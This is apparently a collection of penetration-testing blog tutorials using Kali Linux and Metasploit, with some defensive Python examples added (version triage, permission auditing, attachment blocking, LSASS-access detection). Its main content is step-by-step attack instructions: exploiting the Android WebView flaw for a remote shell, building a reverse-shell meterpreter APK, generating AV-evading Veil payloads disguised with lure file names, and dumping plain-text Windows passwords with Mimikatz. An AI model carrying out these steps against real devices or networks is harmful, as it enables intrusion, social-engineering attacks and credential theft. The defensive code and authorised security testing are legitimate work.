Android Webview Exploit Tutorial (70% of Devices Vulnerable!)

Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.

Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.

And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!

This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:

1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.

2. Type, “use exploit/android/browser/webview_addjavascriptinterface”.

3. Then type, “show options” to see what needs to be set:

For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.

“Security” sounded reassuring.

4. Enter, “set URIPATH Security”:

5. Finally, type “exploit”:


A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.

Now if a vulnerable Android device surfs to our Metasploit module, sitting at in this demo, you get a remote session:

Now just connect to the session using “sessions -i 1”:

And that is it! You are connected to the Android device.

But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:

Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.

A quick check of the path with “echo $PATH” revealed that no path was set:

So I set it by typing, “export PATH=/system/bin:$PATH”:

Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:

As you can see, I had a complete remote shell to the Android device.

All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.

So what can you do to protect yourself against this type of attack?

The exploit only works on versions of Android below 4.2, which apparently is 70% of current devices.

Update your device to the latest version of Android (if it will update); check with your manufacturer for instructions.

Also, never scan in QR Codes from unknown sources.

But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.

I am not sure whether this will be true for all devices; again, the best course of action would be to update to the latest OS version.
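Since the post's mitigation is a version check (anything below 4.2 is exposed), here is an added example of that check done for a fleet of devices rather than one by one. It is not code from the original post; it assumes each device's build properties were collected (for instance with “adb shell getprop”), and the sample outputs are constructed. Android 4.2 is API level 17, where WebView stopped exposing every public method of an injected object and began requiring the @JavascriptInterface annotation.

```python
"""Triage Android devices for the WebView addJavascriptInterface bug by build version.

Added example, not code from the original post. It assumes the build
properties are collected from each device (for instance with
`adb shell getprop`), and applies the post's rule of thumb: builds below
Android 4.2 (API level 17) are exposed. Sample outputs are constructed.
"""
import re

# Android 4.2 / API 17 is where WebView stopped exposing every public method
# of an injected object and began requiring the @JavascriptInterface annotation.
SAFE_SDK = 17
SAFE_RELEASE = (4, 2)

# `getprop` prints one property per line as "[key]: [value]".
GETPROP_RE = re.compile(r"^\[(?P<key>[^\]]+)\]: \[(?P<value>[^\]]*)\]$")


def parse_getprop(text):
    """Parse `getprop` output into a dict of property name -> value."""
    props = {}
    for line in text.splitlines():
        m = GETPROP_RE.match(line.strip())
        if m:
            props[m.group("key")] = m.group("value")
    return props


def parse_release(release):
    """Turn a release string such as '4.0.4' into a comparable tuple of ints.
    Tuples are compared rather than strings because as text '4.10' < '4.2'."""
    parts = []
    for piece in release.split("."):
        digits = re.match(r"\d+", piece)
        if not digits:
            break
        parts.append(int(digits.group()))
    return tuple(parts)


def is_exposed(props):
    """True when the build predates the 4.2 / API 17 fix.

    The SDK level is preferred because it is an integer; the release string
    is the fallback. A device with no usable version info is reported as
    exposed so that it gets looked at rather than silently passed."""
    sdk = props.get("ro.build.version.sdk", "")
    if sdk.isdigit():
        return int(sdk) < SAFE_SDK
    version = parse_release(props.get("ro.build.version.release", ""))
    if not version:
        return True
    return version < SAFE_RELEASE


def triage(samples):
    """Map device label -> True if it needs an OS update before browsing untrusted pages."""
    return {label: is_exposed(parse_getprop(output)) for label, output in samples.items()}


# Constructed sample `getprop` output for three devices (not real device data).
SAMPLES = {
    "tablet-a": "[ro.build.version.release]: [4.0.4]\n[ro.build.version.sdk]: [15]\n",
    "phone-b": "[ro.build.version.release]: [4.2.2]\n[ro.build.version.sdk]: [17]\n",
    "phone-c": "[ro.build.version.release]: [4.1.2]\n",  # sdk property missing
}

if __name__ == "__main__":
    for label, exposed in triage(SAMPLES).items():
        print(f"{label}: {'UPDATE NEEDED' if exposed else 'ok'}")
```

The check is deliberately conservative: a 4.0 device whose browser was patched separately (as the post observed) is still flagged, because the OS build is what can be verified, and a flagged device means “look at it”, not “already owned”.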

Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux”.

Getting a Remote Shell on an Android Device using Metasploit

This article was written a while ago and is out of date, check out my new book “Intermediate Security Testing with Kali Linux” to see an in-depth look at getting a remote shell, reading SMS text messages even on a non-rooted phone, pulling data from the internal Android databases, making your own emulated Android devices and much more!

Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

Creating a booby trapped APK file

First up, we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST= LPORT=4444 R > app.apk

The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it. You will need to put your Kali Linux IP address in for the LHOST address. You can change the port address also if you would like.

Once this is run, a file called “app.apk” will be created:

2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists just about every possible permission, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:

  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost (enter your Kali IP address)
  • set lport 4444

Then just type exploit to start the handler:


6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metasploit system you should see this:

An active session is created and it drops you automatically into a meterpreter prompt.

8. From here you can type “sysinfo” to get information on the device:


9. You can see the processes running by typing, “ps”:

You can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the commands that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:

meterpreter > shell
Process 1 created.
Channel 1 created.

The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.
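The permission list the user sees at install time is the one warning this attack gives, so an added example of reviewing it is shown below. This is not code from the original post: it assumes you have the app's decoded AndroidManifest.xml (for example from apktool), and the two manifests, the list of red-flag permissions and the thresholds are all constructed for the demonstration.

```python
"""Flag apps whose manifests request permissions out of proportion to their purpose.

Added example, not code from the original post. It assumes the decoded
AndroidManifest.xml is available (e.g. from apktool); the sample manifests
and the red-flag list below are constructed for the demonstration.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Permissions that reach well beyond what a game or photo viewer needs,
# each with a plain-language reason so the report says *why* it is a flag.
RED_FLAGS = {
    "android.permission.CALL_PHONE": "can place calls, including paid numbers",
    "android.permission.SEND_SMS": "can send texts (premium SMS fraud)",
    "android.permission.READ_SMS": "can read your text messages",
    "android.permission.READ_CONTACTS": "can read your contacts",
    "android.permission.READ_CALL_LOG": "can read your call history",
    "android.permission.RECORD_AUDIO": "can record from the microphone",
    "android.permission.CAMERA": "can take pictures and video",
    "android.permission.ACCESS_FINE_LOCATION": "can track your precise location",
    "android.permission.RECEIVE_BOOT_COMPLETED": "starts itself when the phone boots",
}


def requested_permissions(manifest_xml):
    """Return the set of permission names a manifest asks for."""
    root = ET.fromstring(manifest_xml)
    return {
        el.get(ANDROID_NS + "name")
        for el in root.iter("uses-permission")
        if el.get(ANDROID_NS + "name")
    }


def audit(manifest_xml, max_flags=2):
    """Return ({flagged permission: reason}, verdict).

    More than `max_flags` red-flag permissions is reported as the
    "total access to the phone" pattern; a few is a caution; none is ok."""
    perms = requested_permissions(manifest_xml)
    flagged = {p: RED_FLAGS[p] for p in sorted(perms) if p in RED_FLAGS}
    if len(flagged) > max_flags:
        verdict = "REVIEW: requests broad access to the phone"
    elif flagged:
        verdict = "CAUTION: some sensitive permissions"
    else:
        verdict = "ok: no sensitive permissions"
    return flagged, verdict


# Constructed manifest resembling an "asks for everything" app (made up).
GREEDY_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.mainactivity">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.CALL_PHONE"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECORD_AUDIO"/>
  <uses-permission android:name="android.permission.CAMERA"/>
  <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
</manifest>"""

# Constructed manifest for a plausible offline puzzle game (made up).
MODEST_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.puzzle">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.VIBRATE"/>
</manifest>"""

if __name__ == "__main__":
    for label, xml in (("greedy", GREEDY_MANIFEST), ("modest", MODEST_MANIFEST)):
        flagged, verdict = audit(xml)
        print(f"{label}: {verdict}")
        for perm, reason in flagged.items():
            print(f"   {perm}: {reason}")
```

The same logic applies to the install-time prompt a user sees: a game that wants to place calls and read texts is the red flag the post describes, and the script only makes that judgement repeatable across many APKs.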

What’s next with Android support on Meterpreter?

Well, it is not “officially” supported yet, but there is an extension available to Meterpreter that allows several new Android based commands:

Pretty amazing stuff!

Want to learn a lot more about Kali and Metasploit? Check out “Basic Security Testing with Kali Linux”.

Veil AV Bypass on Kali

One of the common hurdles of security and penetration testers is bypassing anti-virus on target systems. Veil uses a Metasploit like interface to create a remote shell program that will bypass most Anti-Virus programs.

A little social engineering is required to get the target to run the resultant shell program, but if they do, it will connect back to the Kali system and allow the attacker to have full remote access.

Veil wasn’t originally included in Kali, but has recently been added to the repositories. In this article we will discuss how to install and run Veil on Kali Linux.

Installing Veil

Veil was recently added to Kali, if typing “veil” at a terminal prompt does not start it, it may not be installed yet.

  • To install just type, “apt-get update && apt-get install veil”:
  • Then to run the program open a terminal and just type, “veil”:

And this will bring you to the main menu:

Using Veil

The first thing to do is to list the available payloads using the “list” command:

The payloads are rated by their success rate, so let’s try one of the PowerShell ones.

So just type the “use” command and the number of the payload. We will use the “powershell/VirtualAlloc” payload.

  • Type, “use 9”.

This will select the payload and present us with the following screen:

  • We will just use the default values, so just type, “generate”.

Then you can choose to use Metasploit’s standard msfvenom shellcode or choose your own. We will just choose the default, msfvenom.

  • Type “1” and enter:

Next choose the type of shell; we will just use the default which is reverse_TCP. This means that their computer will connect back to us.

  • Just press “enter” to accept default shell payload:

  • Next Veil will ask for the IP address of the host machine that you are using. Enter the IP address of your Kali machine and press enter.

  • Then enter the Local port that you will be using. I chose to use port 4000:

  • You will then be asked to enter any MSVenom options that you want to use, we won’t be using any, so just press enter to bypass them.

And that is it! Veil will then generate our shellcode with the options that we chose.

  • Now we need to give our created file a name. I chose “CutePuppy”.

Okay, “CutePuppy” sounds a little odd, but remember, you want the target to open the file that you are sending them, so a bit of social engineering is required.

If you know they like cute puppies, then our chosen file name is perfect. But you could also name it “2013 Business Report”, or “New Job Requirements”. Whatever you think would be the best.

Veil now has all that it needs and creates our booby-trapped file.

Our file will be stored in the “/usr/share/veil/output/source/” directory.

Just take the created .bat file and send it to our target. When it is run, it will try to connect out to our machine.

We will now need to start a handler listener to accept the connection.

Getting a Remote Shell

To create the remote handler, we will be using Metasploit.

  • Start the Metasploit Framework from the menu or terminal (msfconsole).
  • Now set up the multi/handler using the following screen:

Be sure to put in the IP address for your machine and the port that you entered into Veil. They must match exactly.

Metasploit will then start the handler and wait for a connection:

Now we just need the victim to run the file that we sent them.

On the Windows 7 machine, if the file is executed, we will see this on our Kali system:

A reverse shell session!

Then if we type “shell”, we see that we do in fact have a complete remote shell:

This should help prove that you cannot trust in your Firewall and Anti-Virus alone to protect you from online threats. Unfortunately many times your network security depends on your users and what they allow to run.

Instruct your users to never run any programs or open any files that they get in an unsolicited e-mail.

Blocking certain file types from entering or leaving your network is also a good idea.
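As an added example of that file-type blocking, here is a gateway-style check over attachment names. It is not code from the original post; the blocked-extension list and the sample names (including a “CutePuppy.bat” like the one above) are constructed, and a real gateway would also open archives and check file magic, which this does not.

```python
"""Gateway-style check for attachments Windows would execute, including disguised ones.

Added example, not code from the original post. The blocked-extension list
and the sample attachment names are constructed for the demonstration; a real
gateway would also open archives and check file magic, which this does not.
"""
import os

# Extensions Windows runs directly on double-click (not an exhaustive list).
BLOCKED_EXTENSIONS = {
    ".bat", ".cmd", ".exe", ".scr", ".pif", ".com",
    ".ps1", ".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".lnk",
}

# Unicode right-to-left override: makes "photo<RLO>gpj.exe" display as "photoexe.jpg".
RLO = "\u202e"


def all_extensions(filename):
    """Return every trailing extension, lower-cased, outermost last:
    'Report.pdf.bat' -> ['.pdf', '.bat']. Only the last one matters to the OS."""
    exts = []
    base = filename
    while True:
        base, ext = os.path.splitext(base)
        if not ext:
            # os.path.splitext treats a leading dot as part of the name, so a
            # file literally called ".bat" would otherwise slip through.
            if base.startswith(".") and len(base) > 1:
                exts.insert(0, base.lower())
            break
        exts.insert(0, ext.lower())
    return exts


def classify(filename):
    """Return (should_hold, reasons) for one attachment name."""
    reasons = []
    if RLO in filename:
        reasons.append("contains right-to-left override (display-name spoofing)")
    exts = all_extensions(filename)
    if exts and exts[-1] in BLOCKED_EXTENSIONS:
        reasons.append(f"executable extension {exts[-1]}")
        if len(exts) > 1:
            reasons.append(f"disguised with extra extension {exts[-2]}")
    return bool(reasons), reasons


def scan(names):
    """Return {name: reasons} for every attachment that should be held."""
    held = {}
    for name in names:
        hold, reasons = classify(name)
        if hold:
            held[name] = reasons
    return held


# Constructed sample attachment names (not from real mail).
SAMPLES = [
    "CutePuppy.bat",
    "2013 Business Report.docx",
    "New Job Requirements.pdf.BAT",
    "invoice.PDF",
    "photo\u202egpj.exe",
    "setup.exe.txt",   # ends in .txt, so Windows opens it in a text editor
]

if __name__ == "__main__":
    for name, reasons in scan(SAMPLES).items():
        print(f"HOLD {name!r}: {'; '.join(reasons)}")
```

Two details carry the weight here: the comparison is case-insensitive (“.BAT” runs just like “.bat”), and only the final extension decides, so “Report.pdf.bat” is held while “setup.exe.txt” is not.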

And finally, using a Network Security Monitoring system will help track down what happened and what was compromised if the worst does happen.

Recovering Plain Text Passwords with Metasploit and Mimikatz

I haven’t been posting as much recently as I have been hard at work writing a new book on basic security testing with Kali Linux and other open source security tools. The bad thing is it is taking up about all of my free time now. The good thing is that I am going over a lot of exceptional material that I don’t think I have posted here before.

So today I decided to post a sneak peek at what type of material will be in the book.

Mimikatz, created by our friend Gentil Kiwi, is a great password recovery tool. It is able to recover passwords from several Windows processes in PLAIN TEXT.

Not too long ago a Mimikatz module was added to Metasploit, so recovering clear text passwords once you have a remote meterpreter shell is easier than ever.

So let’s check it out!

Clear Text Passwords with Mimikatz

We will start out with a post exploit scenario. Using Metasploit we already ran a successful exploit and now have an active remote meterpreter session.

Luckily our target user was using an administrator account and we used the Bypass UAC module to bump our access up to System level. (Explained in the book)

Now we just need to load in the mimikatz module. There is a 32 and 64 bit module, choose accordingly. For this demo we will be using the 32 bit.

  1. At the Meterpreter prompt, type “load mimikatz”.
  2. We will now have a mimikatz prompt. Type “help” for a list of available commands:

The help is pretty self-explanatory; basically type the command corresponding to the credentials that you want to recover. So for Kerberos just type “kerberos” at the Meterpreter prompt, or type “msv” to recover the hashes.

Using these commands you can recover user passwords from multiple system sources – Windows Login passwords, MS Live passwords, terminal server passwords, etc.

You can also use the “mimikatz_command” command to perform even more functions like retrieving stored certificates.

But for today we are just interested in passwords.

Recovering Hashes and Plain Text Passwords

  1. Type “msv”.

And there you go – a list of the password hashes. Well, we could grab the hash and try to crack it, or run it through an online rainbow table, but what if we don’t have that kind of time?

It would be nice just to get the password in plain text.

Well… You can.

  1. Type “kerberos”.

If you look at our user Ralf, you will see his password in plain text!

And that is it, after we get a remote session with Metasploit and using Mimikatz, recovering clear text passwords is just a few commands away.
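What Mimikatz does to get those plain text passwords is read the memory of the LSASS process, and that is what a defender can watch for. The added example below (not code from the original post) runs a simple detection over Sysmon Event ID 10 process-access records; the records are constructed, the field names are Sysmon's, and the allowlist of benign source processes is an assumption to be tuned per environment.

```python
"""Flag LSASS memory reads in Sysmon process-access (Event ID 10) records.

Added example, not code from the original post. Mimikatz recovers the
secrets it shows you by reading the memory of lsass.exe, and Sysmon Event
ID 10 records which process opened which other process and with what
access mask. The events below are constructed for the demonstration, and
the allowlist of benign source images is an assumption to tune per fleet.
"""

# Process access rights from winnt.h that allow reading/writing another
# process's memory. A GrantedAccess mask with either bit set, aimed at
# lsass.exe, is what a credential dumper needs.
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020

# Assumed allowlist of system processes that open lsass.exe routinely.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\program files\windows defender\msmpeng.exe",
}


def is_lsass_read(event):
    """True if a Sysmon EID 10 event shows a non-allowlisted process opening
    lsass.exe with memory read or write rights. GrantedAccess is the hex
    string Sysmon logs, e.g. '0x1010'."""
    target = event.get("TargetImage", "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    if event.get("SourceImage", "").lower() in BENIGN_SOURCES:
        return False
    granted = int(event.get("GrantedAccess", "0x0"), 16)
    return bool(granted & (PROCESS_VM_READ | PROCESS_VM_WRITE))


def find_lsass_access(events):
    """Return the events worth an analyst's attention, in log order."""
    return [e for e in events if is_lsass_read(e)]


# Constructed Sysmon Event ID 10 records (field names are Sysmon's; values are made up).
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Users\demo\Downloads\update.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010"},
    {"SourceImage": r"C:\Windows\system32\svchost.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1410"},
    {"SourceImage": r"C:\Windows\system32\taskmgr.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
    {"SourceImage": r"C:\Windows\system32\notepad.exe",
     "TargetImage": r"C:\Windows\system32\conhost.exe", "GrantedAccess": "0x1fffff"},
    {"SourceImage": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x143a"},
]

if __name__ == "__main__":
    for e in find_lsass_access(SAMPLE_EVENTS):
        print(f"ALERT {e['SourceImage']} opened lsass.exe with {e['GrantedAccess']}")
```

A query-only open (0x1000) is ignored, a read-capable open from an unexpected binary is not, and the allowlist is matched on the full lower-cased path so a look-alike svchost.exe in a user directory still alerts. On Windows versions that support it, LSA Protection (the RunAsPPL setting) stops unsigned processes from opening LSASS in the first place; this detection catches the attempts either way.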

(As always do not try these techniques on networks that you do not own or do not have permission to do so. Doing so could get you into serious trouble and you could end up in jail.)